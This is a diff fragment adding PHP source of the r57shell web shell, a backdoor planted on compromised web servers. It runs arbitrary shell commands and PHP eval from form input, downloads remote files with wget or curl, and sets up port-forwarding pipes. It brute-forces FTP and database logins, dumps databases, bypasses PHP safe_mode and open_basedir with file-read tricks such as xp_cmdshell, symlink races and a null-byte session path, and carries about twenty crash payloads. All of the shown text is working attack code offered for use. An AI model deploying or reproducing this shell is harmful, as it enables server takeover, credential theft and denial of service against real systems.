+ cf("/tmp/dp",$datapipe_pl);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
+ $_POST['cmd']="ps -aux | grep dp";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/dpc.c",$datapipe_c);
+ $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
+ @unlink("/tmp/dpc.c");
+ $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
+ $_POST['cmd']="ps -aux | grep dpc";
+}
+
+if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; }
+
+for($upl=0;$upl<=16;$upl++)
+{
+ if(!empty($HTTP_POST_FILES['userfile'.$upl]['name'])){
+  if(!empty($_POST['new_name']) && ($upl==0)) { $nfn = $_POST['new_name']; }
+  else { $nfn = $HTTP_POST_FILES['userfile'.$upl]['name']; }
+  @move_uploaded_file($HTTP_POST_FILES['userfile'.$upl]['tmp_name'],$_POST['dir']."/".$nfn)
+  or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile'.$upl]['name']."</div></font>");
+ }
+}
+
+if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
+{
+ switch($_POST['with'])
+ {
+ case 'fopen':
+ $datafile = @implode("", @file($_POST['rem_file']));
+ if($datafile)
+  {
+   $w_file=@fopen($_POST['loc_file'],"wb") or @function_exists('file_put_contents') or err(0);
+   if($w_file)
+   {
+    @fwrite($w_file,$datafile) or @fputs($w_file,$datafile) or @file_put_contents($_POST['loc_file'],$datafile);
+    @fclose($w_file);
+   }
+  }
+ $_POST['cmd'] = '';
+ break;
+ case 'wget':
+ $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
+ break;
+ case 'fetch':
+ $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
+ break;
+ case 'lynx':
+ $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case 'links':
+ $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case 'GET':
+ $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case 'curl':
+ $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
+ break;
+ }
+}
+if(!empty($_POST['cmd']) && (($_POST['cmd']=="ftp_file_up") || ($_POST['cmd']=="ftp_file_down")))
+ {
+ list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
+ if(empty($ftp_port)) { $ftp_port = 21; }
+ $connection = @ftp_connect ($ftp_server,$ftp_port,10);
+ if(!$connection) { err(3); }
+ else 
+  {   
+  if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); }
+  else 
+   {
+   if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);}
+   if($_POST['cmd']=="ftp_file_up")   { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);}
+   }
+  }
+ @ftp_close($connection);
+ $_POST['cmd'] = "";
+ }
+
+if(!empty($_POST['cmd']) && (($_POST['cmd']=="ftp_brute") || ($_POST['cmd']=="db_brute")))
+ {
+ if($_POST['cmd']=="ftp_brute"){
+  list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
+  if(empty($ftp_port)) { $ftp_port = 21; }
+  $connection = @ftp_connect ($ftp_server,$ftp_port,10);
+ }else if($_POST['cmd']=="db_brute"){
+   $connection = 1;
+ }
+ if(!$connection) { err(3); $_POST['cmd'] = ""; }
+ else if(($_POST['brute_method']=='passwd') && (!$users=get_users('/etc/passwd'))){ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
+ else if(($_POST['brute_method']=='dic') && (!$users=get_users($_POST['dictionary']))){ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>Can\'t get password list</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
+ if($_POST['cmd']=="ftp_brute"){@ftp_close($connection);}
+ }
+
+echo $table_up3;
+if (empty($_POST['cmd']) && !$safe_mode && !$open_basedir) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); }
+else if(empty($_POST['cmd']) && ($safe_mode || $open_basedir)){ $_POST['cmd']="safe_dir"; }
+echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
+if($safe_mode || $open_basedir)
+{
+ switch($_POST['cmd'])
+ {
+ case 'safe_dir':
+  $d=@dir($dir);
+  if ($d)
+   {
+   while (false!==($file=$d->read()))
+    {
+     if ($file=="." || $file=="..") continue;
+     @clearstatcache();
+     @list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
+     if(!$unix){ 
+     echo date("d.m.Y H:i",$mtime);
+     if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
+     }
+     else{ 
+     if(@function_exists('posix_getpwuid')){
+      $owner = @posix_getpwuid($uid);
+      $grgid = @posix_getgrgid($gid);
+     }else{$owner['name']=$grgid['name']='';}
+     echo $inode." ";
+     echo perms(@fileperms($file));
+     @printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
+     echo date("d.m.Y H:i ",$mtime);
+     }
+     echo "$file\n";
+    }
+   $d->close();
+   }
+  else if(@function_exists('glob'))
+   { 
+       function eh($errno, $errstr, $errfile, $errline)
+        {
+          global $D, $c, $i; 
+          preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o); 
+          if($o){ $D[$c] = $o[2]; $c++;} 
+        }
+       $error_reporting = @ini_get('error_reporting');
+       error_reporting(E_WARNING); 
+       @ini_set("display_errors", 1); 
+       $root = "/"; 
+       if($dir) $root = $dir; 
+       $c = 0; $D = array(); 
+       @set_error_handler("eh"); 
+       $chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; 
+       for($i=0; $i < strlen($chars); $i++)
+       {
+        $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}"; 
+        $prevD = $D[count($D)-1]; 
+        @glob($path."*"); 
+        if($D[count($D)-1] != $prevD)
+         {
+           for($j=0; $j < strlen($chars); $j++)
+           {
+            $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}"; 
+            $prevD2 = $D[count($D)-1]; 
+            @glob($path."*"); 
+            if($D[count($D)-1] != $prevD2)
+             {
+              for($p=0; $p < strlen($chars); $p++)
+               {
+                $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}"; 
+                $prevD3 = $D[count($D)-1]; 
+                @glob($path."*"); 
+                if($D[count($D)-1] != $prevD3)
+                 {
+                  for($r=0; $r < strlen($chars); $r++)
+                   {
+                    $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}"; 
+                    @glob($path."*"); 
+                   } 
+                 }        
+               } 
+             }        
+           }    
+         } 
+       } 
+       $D = array_unique($D); 
+       foreach($D as $item) echo htmlspecialchars("{$item}")."\r\n"; 
+       error_reporting($error_reporting);
+   }
+  else echo $lang[$language.'_text29'];
+ break;
+  case 'test1':
+  $ci = @curl_init("file://".$_POST['test1_file']);
+  $cf = @curl_exec($ci);
+  echo htmlspecialchars($cf);
+  break;
+  case 'test2':
+  @include($_POST['test2_file']);
+  break;
+  case 'test3':
+  if(empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
+  $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['test3_md'],$db))
+    {
+     @mysql_query("DROP TABLE IF EXISTS temp_r57_table");
+     @mysql_query("CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL )");
+     @mysql_query("LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table");
+     $r = @mysql_query("SELECT * FROM temp_r57_table");
+     while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0])."\r\n"; }
+     @mysql_query("DROP TABLE IF EXISTS temp_r57_table");
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mysql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to mysql server";
+  break;
+  case 'test4':
+  if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
+  $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
+  if($db)
+   {
+   if(@mssql_select_db($_POST['test4_md'],$db))
+    {
+     @mssql_query("drop table r57_temp_table",$db);
+     @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
+     @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
+     $res = mssql_query("select * from r57_temp_table",$db);
+     while(($row=@mssql_fetch_row($res)))
+      {
+      echo htmlspecialchars($row[0])."\r\n";
+      }
+    @mssql_query("drop table r57_temp_table",$db);
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mssql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to MSSQL server";
+  break;
+  case 'test5':
+  $temp=tempnam($dir, "fname");
+  if (@file_exists($temp)) @unlink($temp);
+  $extra = "-C ".$_POST['test5_file']." -X $temp";
+  @mb_send_mail(NULL, NULL, NULL, NULL, $extra);
+  $str = moreread($temp);
+  echo htmlspecialchars($str);
+  @unlink($temp);
+  break;
+  case 'test6':
+  $stream = @imap_open('/etc/passwd', "", "");
+  $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
+  for ($i = 0; $i < count($dir_list); $i++) echo htmlspecialchars($dir_list[$i])."\r\n";
+  @imap_close($stream);
+  break;
+  case 'test7':
+  $stream = @imap_open($_POST['test7_file'], "", "");
+  $str = @imap_body($stream, 1);
+  echo htmlspecialchars($str);
+  @imap_close($stream);
+  break;
+  case 'test8':
+  $temp=@tempnam($_POST['test8_file2'], "copytemp");
+  $str = readzlib($_POST['test8_file1'],$temp);
+  echo htmlspecialchars($str);
+  @unlink($temp);
+  break;
+  case 'test9':
+  @ini_restore("safe_mode");
+  @ini_restore("open_basedir");
+  $str = moreread($_POST['test9_file']);
+  echo htmlspecialchars($str);
+  break;
+  case 'test10':
+  @ob_clean();
+  $error_reporting = @ini_get('error_reporting');
+  error_reporting(E_ALL ^ E_NOTICE);
+  @ini_set("display_errors", 1); 
+  $str=fopen($_POST['test10_file'],"r");
+  while(!feof($str)){print htmlspecialchars(fgets($str));}
+  fclose($str);
+  error_reporting($error_reporting);
+  break;
+  case 'test11':
+  @ob_clean();
+  $temp = 'zip://'.$_POST['test11_file'];
+  $str = moreread($temp);
+  echo htmlspecialchars($str);
+  break;
+  case 'test12':
+  @ob_clean();
+  $temp = 'compress.bzip2://'.$_POST['test12_file'];
+  $str = moreread($temp);
+  echo htmlspecialchars($str);
+  break;
+  case 'test13':
+  @error_log($_POST['test13_file1'], 3, "php://../../../../../../../../../../../".$_POST['test13_file2']);
+  echo $lang[$language.'_text61'];
+  break;
+  case 'test14':
+  @session_save_path($_POST['test14_file2']."\0;/tmp");
+  @session_start();
+  @$_SESSION[php]=$_POST['test14_file1'];
+  echo $lang[$language.'_text61'];
+  break;
+  case 'test15':
+  
+  @readfile($_POST['test15_file1'], 3, "php://../../../../../../../../../../../".$_POST['test15_file2']);
+  echo $lang[$language.'_text61'];
+  break;
+  case 'test16':
+  if (fopen('srpath://../../../../../../../../../../../'.$_POST['test16_file'],"a")) echo $lang[$language.'_text61'];
+  break;
+  case 'test17_1':
+  @unlink('symlinkread');
+  @symlink('a/a/a/a/a/a/', 'dummy');
+  @symlink('dummy/../../../../../../../../../../../'.$_POST['test17_file'], 'symlinkread');
+  @unlink('dummy');
+  while (1) 
+   {
+    @symlink('.', 'dummy');
+    @unlink('dummy');
+   }
+  break;
+  case 'test17_2':
+  $str='';
+  while (strlen($str) < 3) {   
+   $temp = 'symlinkread';
+   $str = moreread($temp);
+   if($str){ @ob_clean(); echo htmlspecialchars($str);}
+  }
+  break;
+  case 'test17_3':
+  $dir = $files = array();
+  if(@version_compare(@phpversion(),"5.0.0")>=0){
+   while (@count($dir) < 3) {
+    $dir=@scandir('symlinkread');
+    if (@count($dir) > 2) {@ob_clean(); @print_r($dir); }
+   }
+  }
+  else {
+   while (@count($files) < 3) {
+    $dh  = @opendir('symlinkread');
+    while (false !== ($filename = @readdir($dh))) {
+     $files[] = $filename;
+    }
+    if(@count($files) > 2){@ob_clean(); @print_r($files); }
+   }
+  }
+  break;
+ }
+}
+if((!$safe_mode) && ($_POST['cmd']!="php_eval") && ($_POST['cmd']!="mysql_dump") && ($_POST['cmd']!="db_query") && ($_POST['cmd']!="ftp_brute") && ($_POST['cmd']!="db_brute")){
+ $cmd_rep = ex($_POST['cmd']);
+ if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
+ else { echo @htmlspecialchars($cmd_rep)."\n"; }}
+
+switch($_POST['cmd'])
+{
+ case 'dos1':
+ function a() { a(); } a();
+ break;
+ case 'dos2':
+ @pack("d4294967297", 2);
+ break;
+ case 'dos3':
+ $a = "a";@unserialize(@str_replace('1', 2147483647, @serialize($a)));
+ break;
+ case 'dos4':
+ $t = array(1);while (1) {$a[] = &$t;};
+ break;
+ case 'dos5':
+ @dl("sqlite.so");$db = new SqliteDatabase("foo");
+ break;
+ case 'dos6':
+ preg_match('/(.(?!b))*/', @str_repeat("a", 10000));
+ break;
+ case 'dos7':
+ @str_replace("A", str_repeat("B", 65535), str_repeat("A", 65538));
+ break;
+ case 'dos8':
+ @shell_exec("killall -11 httpd");
+ break;
+ case 'dos9':
+ function cx(){ @tempnam("/www/", "../../../../../../var/tmp/cx"); cx(); } cx();
+ break;
+ case 'dos10':
+ $a = @str_repeat ("A",438013);$b = @str_repeat ("B",951140);@wordwrap ($a,0,$b,0);
+ break;
+ case 'dos11':
+ @array_fill(1,123456789,"Infigo-IS");
+ break;
+ case 'dos12':
+ @substr_compare("A","A",12345678);
+ break;
+ case 'dos13':
+ @unserialize("a:2147483649:{");
+ break;
+ case 'dos14':
+ $Data = @str_ireplace("\n", "<br>", $Data);
+ break;
+ case 'dos15':
+ function toUTF($x) {return chr(($x >> 6) + 192) . chr(($x & 63) + 128);}
+ $str1 = "";for($i=0; $i < 64; $i++){ $str1 .= toUTF(977);}
+ @htmlentities($str1, ENT_NOQUOTES, "UTF-8");
+ break;
+ case 'dos16':
+ $r = @zip_open("x.zip");$e = @zip_read($r);$x = @zip_entry_open($r, $e);
+ for ($i=0; $i<1000; $i++) $arr[$i]=array(array(""));
+ unset($arr[600]);@zip_entry_read($e, -1);unset($arr[601]);
+ break;
+ case 'dos17':
+ $z = "UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU"; 
+ $y = "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD"; 
+ $x = "AQ                                                                        "; 
+ unset($z);unset($y);$x = base64_decode($x);$y = @sqlite_udf_decode_binary($x);unset($x);
+ break;
+ case 'dos18':
+ $MSGKEY = 519052;$msg_id = @msg_get_queue ($MSGKEY, 0600); 
+ if (!@msg_send ($msg_id, 1, 'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHH', false, true, $msg_err)) 
+ echo "Msg not sent because $msg_err\n"; 
+ if (@msg_receive ($msg_id, 1, $msg_type, 0xffffffff, $_SESSION, false, 0, $msg_error)) { 
+ echo "$msg\n"; 
+ } else { echo "Received $msg_error fetching message\n"; break; } 
+ @msg_remove_queue ($msg_id);
+ break;
+ case 'dos19':
+ $url = "php://filter/read=OFF_BY_ONE./resource=/etc/passwd"; @fopen($url, "r");
+ break;
+ case 'dos20':
+ $hashtable = str_repeat("A", 39);
+ $hashtable[5*4+0]=chr(0x58);$hashtable[5*4+1]=chr(0x40);$hashtable[5*4+2]=chr(0x06);$hashtable[5*4+3]=chr(0x08);
+ $hashtable[8*4+0]=chr(0x66);$hashtable[8*4+1]=chr(0x77);$hashtable[8*4+2]=chr(0x88);$hashtable[8*4+3]=chr(0x99);
+ $str = 'a:100000:{s:8:"AAAABBBB";a:3:{s:12:"0123456789AA";a:1:{s:12:"AAAABBBBCCCC";i:0;}s:12:"012345678AAA";i:0;s:12:"012345678BAN";i:0;}';
+ for ($i=0; $i<65535; $i++) { $str .= 'i:0;R:2;'; }
+ $str .= 's:39:"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";s:39:"'.$hashtable.'";i:0;R:3;';
+ @unserialize($str);
+ break;
+}
+
+if ($_POST['cmd']=="php_eval"){
+ $eval = @str_replace("<?","",$_POST['php_eval']);
+ $eval = @str_replace("?>","",$eval);
+ @eval($eval);}
+
+if ($_POST['cmd']=="ftp_brute")
+ {
+ $suc = 0;
+ if($_POST['brute_method']=='passwd'){
+ foreach($users as $user)
+  {
+    $connection = @ftp_connect($ftp_server,$ftp_port,10);
+    if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
+    else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } } 
+    @ftp_close($connection);
+  }
+ }else if(($_POST['brute_method']=='dic') && isset($_POST['ftp_login'])){
+  foreach($users as $user)
+  {
+    $connection = @ftp_connect($ftp_server,$ftp_port,10);
+    if(@ftp_login($connection,$_POST['ftp_login'],$user)) { echo "[+] ".$_POST['ftp_login'].":$user - success\r\n"; $suc++; }
+    @ftp_close($connection);
+  }
+ }
+ echo "\r\n-------------------------------------\r\n";
+ $count = count($users);
+ if(isset($_POST['reverse']) && ($_POST['brute_method']=='passwd')) { $count *= 2; }
+ echo $lang[$language.'_text97'].$count."\r\n";
+ echo $lang[$language.'_text98'].$suc."\r\n";
+ }
+
+if ($_POST['cmd']=="db_brute")
+ {
+ $suc = 0;
+ if($_POST['brute_method']=='passwd'){
+ foreach($users as $user)
+  {
+   $sql = new my_sql();
+   $sql->db   = $_POST['db'];
+   $sql->host = $_POST['db_server'];
+   $sql->port = $_POST['db_port'];
+   $sql->user = $user;
+   $sql->pass = $user;
+   if($sql->connect()) { echo "[+] $user:$user - success\r\n"; $suc++; }
+  }
+ if(isset($_POST['reverse']))
+  {
+   foreach($users as $user)
+    {
+     $sql = new my_sql();
+     $sql->db   = $_POST['db'];
+     $sql->host = $_POST['db_server'];
+     $sql->port = $_POST['db_port'];
+     $sql->user = $user;
+     $sql->pass = strrev($user);
+     if($sql->connect()) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; }
+    }
+  }
+ }else if(($_POST['brute_method']=='dic') && isset($_POST['mysql_l'])){
+  foreach($users as $user)
+  {
+   $sql = new my_sql();
+   $sql->db   = $_POST['db'];
+   $sql->host = $_POST['db_server'];
+   $sql->port = $_POST['db_port'];
+   $sql->user = $_POST['mysql_l'];
+   $sql->pass = $user;
+   if($sql->connect()) { echo "[+] ".$_POST['mysql_l'].":$user - success\r\n"; $suc++; }
+  }
+ }
+ echo "\r\n-------------------------------------\r\n";
+ $count = count($users);
+ if(isset($_POST['reverse']) && ($_POST['brute_method']=='passwd')) { $count *= 2; }
+ echo $lang[$language.'_text97'].$count."\r\n";
+ echo $lang[$language.'_text98'].$suc."\r\n";
+ }
+
+if ($_POST['cmd']=="mysql_dump")
+ {
+  if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
+  $sql = new my_sql();
+  $sql->db   = $_POST['db'];
+  $sql->host = $_POST['db_server'];
+  $sql->port = $_POST['db_port'];
+  $sql->user = $_POST['mysql_l'];
+  $sql->pass = $_POST['mysql_p'];
+  $sql->base = $_POST['mysql_db'];
+  if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
+  else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
+  else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
+  else {
+   if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
+   else if($fp || @function_exists('file_put_contents')){ foreach($sql->dump as $v){ @fwrite($fp,$v."\r\n") or @fputs($fp,$v."\r\n") or @file_put_contents($_POST['dif_name'],$v."\r\n");} } 
+   else { echo "[-] ERROR! Can't write in dump file"; }
+   }
+ } 
+
+echo "</textarea></div>";
+echo "</b>";
+echo "</td></tr></table>";
+echo "<table width=100% cellpadding=0 cellspacing=0>";
+
+function div_title($title, $id)
+{
+  return '<a style="cursor: pointer;" onClick="change_divst(\''.$id.'\');">'.$title.'</a>';
+}
+function div($id)
+ { 
+ if(isset($_COOKIE[$id]) && ($_COOKIE[$id]==0)) return '<div id="'.$id.'" style="display: none;">'; 
+ $divid=array('id5','id6','id8','id9','id10','id11','id16','id24','id25','id26','id27','id28','id29','id33','id34','id35','id37','id38');
+ if(empty($_COOKIE[$id]) && @in_array($id,$divid)) return '<div id="'.$id.'" style="display: none;">'; 
+ return '<div id="'.$id.'">';
+ }
+ 
+if(!$safe_mode){
+echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts;
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+else{
+echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts;
+echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
+echo $te.'</div>'.$table_end1.$fe;
+
+if($safe_mode || $open_basedir){
+echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts;
+echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+if($unix && @function_exists('touch')){
+echo $fs.$table_up1.div_title($lang[$language.'_text128'],'id5').$table_up2.div('id5').$ts;
+echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','file_name',40,(!empty($_POST['file_name'])?($_POST['file_name']):($dir."/r57shell.php")))
+.ws(4)."<b>".$lang[$language.'_text26'].ws(2).$lang[$language.'_text59'].$arrow."</b>"
+.ws(2).in('text','file_name_r',40,(!empty($_POST['file_name_r'])?($_POST['file_name_r']):(""))));
+echo sr(15,"<b> or set  Day".$arrow."</b>",
+'
+<select name="day" size="1">
+<option value="01">1</option>
+<option value="02">2</option>
+<option value="03">3</option>
+<option value="04">4</option>
+<option value="05">5</option>
+<option value="06">6</option>
+<option value="07">7</option>
+<option value="08">8</option>
+<option value="09">9</option>
+<option value="10">10</option>
+<option value="11">11</option>
+<option value="12">12</option>
+<option value="13">13</option>
+<option value="14">14</option>
+<option value="15">15</option>
+<option value="16">16</option>
+<option value="17">17</option>
+<option value="18">18</option>
+<option value="19">19</option>
+<option value="20">20</option>
+<option value="21">21</option>
+<option value="22">22</option>
+<option value="23">23</option>
+<option value="24">24</option>
+<option value="25">25</option>
+<option value="26">26</option>
+<option value="27">27</option>
+<option value="28">28</option>
+<option value="29">29</option>
+<option value="30">30</option>
+<option value="31">31</option>
+</select>'
+.ws(4)."<b>Month".$arrow."</b>"
+.'
+<select name="month" size="1">
+<option value="January">January</option>
+<option value="February">February</option>
+<option value="March">March</option>
+<option value="April">April</option>
+<option value="May">May</option>
+<option value="June">June</option>
+<option value="July">July</option>
+<option value="August">August</option>
+<option value="September">September</option>
+<option value="October">October</option>
+<option value="November">November</option>
+<option value="December">December</option>
+</select>'
+.ws(4)."<b>Year".$arrow."</b>"
+.'
+<select name="year" size="1">
+<option value="1998">1998</option>
+<option value="1999">1999</option>
+<option value="2000">2000</option>
+<option value="2001">2001</option>
+<option value="2002">2002</option>
+<option value="2003">2003</option>
+<option value="2004">2004</option>
+<option value="2005">2005</option>
+<option value="2006">2006</option>
+<option value="2006">2007</option>
+<option value="2006">2008</option>
+<option value="2006">2009</option>
+<option value="2006">2010</option>
+</select>'
+.ws(4)."<b>Hour".$arrow."</b>"
+.'
+<select name="chasi" size="1">
+<option value="01">01</option>
+<option value="02">02</option>
+<option value="03">03</option>
+<option value="04">04</option>
+<option value="05">05</option>
+<option value="06">06</option>
+<option value="07">07</option>
+<option value="08">08</option>
+<option value="09">09</option>
+<option value="10">10</option>
+<option value="11">11</option>
+<option value="12">12</option>
+<option value="13">13</option>
+<option value="14">14</option>
+<option value="15">15</option>
+<option value="16">16</option>
+<option value="17">17</option>
+<option value="18">18</option>
+<option value="19">19</option>
+<option value="20">20</option>
+<option value="21">21</option>
+<option value="22">22</option>
+<option value="23">23</option>
+<option value="24">24</option>
+</select>'
+.ws(4)."<b>Minute".$arrow."</b>"
+.'
+<select name="minutes" size="1">
+<option value="01">1</option>
+<option value="02">2</option>
+<option value="03">3</option>
+<option value="04">4</option>
+<option value="05">5</option>
+<option value="06">6</option>
+<option value="07">7</option>
+<option value="08">8</option>
+<option value="09">9</option>
+<option value="10">10</option>
+<option value="11">11</option>
+<option value="12">12</option>
+<option value="13">13</option>
+<option value="14">14</option>
+<option value="15">15</option>
+<option value="16">16</option>
+<option value="17">17</option>
+<option value="18">18</option>
+<option value="19">19</option>
+<option value="20">20</option>
+<option value="21">21</option>
+<option value="22">22</option>
+<option value="23">23</option>
+<option value="24">24</option>
+<option value="25">25</option>
+<option value="26">26</option>
+<option value="27">27</option>
+<option value="28">28</option>
+<option value="29">29</option>
+<option value="30">30</option>
+<option value="31">31</option>
+<option value="32">32</option>
+<option value="33">33</option>
+<option value="34">34</option>
+<option value="35">35</option>
+<option value="36">36</option>
+<option value="37">37</option>
+<option value="38">38</option>
+<option value="39">39</option>
+<option value="40">40</option>
+<option value="41">41</option>
+<option value="42">42</option>
+<option value="43">43</option>
+<option value="44">44</option>
+<option value="45">45</option>
+<option value="46">46</option>
+<option value="47">47</option>
+<option value="48">48</option>
+<option value="49">49</option>
+<option value="50">50</option>
+<option value="51">51</option>
+<option value="52">52</option>
+<option value="53">53</option>
+<option value="54">54</option>
+<option value="55">55</option>
+<option value="56">56</option>
+<option value="57">57</option>
+<option value="58">58</option>
+<option value="59">59</option>
+</select>'
+.ws(4)."<b>Second".$arrow."</b>"
+.'
+<select name="second" size="1">
+<option value="01">1</option>
+<option value="02">2</option>
+<option value="03">3</option>
+<option value="04">4</option>
+<option value="05">5</option>
+<option value="06">6</option>
+<option value="07">7</option>
+<option value="08">8</option>
+<option value="09">9</option>
+<option value="10">10</option>
+<option value="11">11</option>
+<option value="12">12</option>
+<option value="13">13</option>
+<option value="14">14</option>
+<option value="15">15</option>
+<option value="16">16</option>
+<option value="17">17</option>
+<option value="18">18</option>
+<option value="19">19</option>
+<option value="20">20</option>
+<option value="21">21</option>
+<option value="22">22</option>
+<option value="23">23</option>
+<option value="24">24</option>
+<option value="25">25</option>
+<option value="26">26</option>
+<option value="27">27</option>
+<option value="28">28</option>
+<option value="29">29</option>
+<option value="30">30</option>
+<option value="31">31</option>
+<option value="32">32</option>
+<option value="33">33</option>
+<option value="34">34</option>
+<option value="35">35</option>
+<option value="36">36</option>
+<option value="37">37</option>
+<option value="38">38</option>
+<option value="39">39</option>
+<option value="40">40</option>
+<option value="41">41</option>
+<option value="42">42</option>
+<option value="43">43</option>
+<option value="44">44</option>
+<option value="45">45</option>
+<option value="46">46</option>
+<option value="47">47</option>
+<option value="48">48</option>
+<option value="49">49</option>
